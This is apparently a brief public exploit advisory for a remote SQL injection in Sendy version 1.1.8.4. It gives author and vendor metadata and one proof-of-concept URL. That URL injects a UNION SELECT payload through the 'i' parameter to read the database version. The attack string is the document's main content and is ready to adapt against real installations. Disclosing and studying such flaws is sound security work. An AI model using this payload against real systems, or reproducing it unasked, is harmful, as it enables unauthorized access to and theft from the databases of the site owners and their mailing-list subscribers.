Sendy version 1.1.8.4 suffers from a remote SQL injection vulnerability.
74aae280b77a5843f8d578ac23031384027384e97236c1b96f69bd194871de8d
# Exploit Title: Sendy SqlInject
# Date: 2014-02-24
# Exploit Author: Hurley
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.8.4
Demo page:
http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--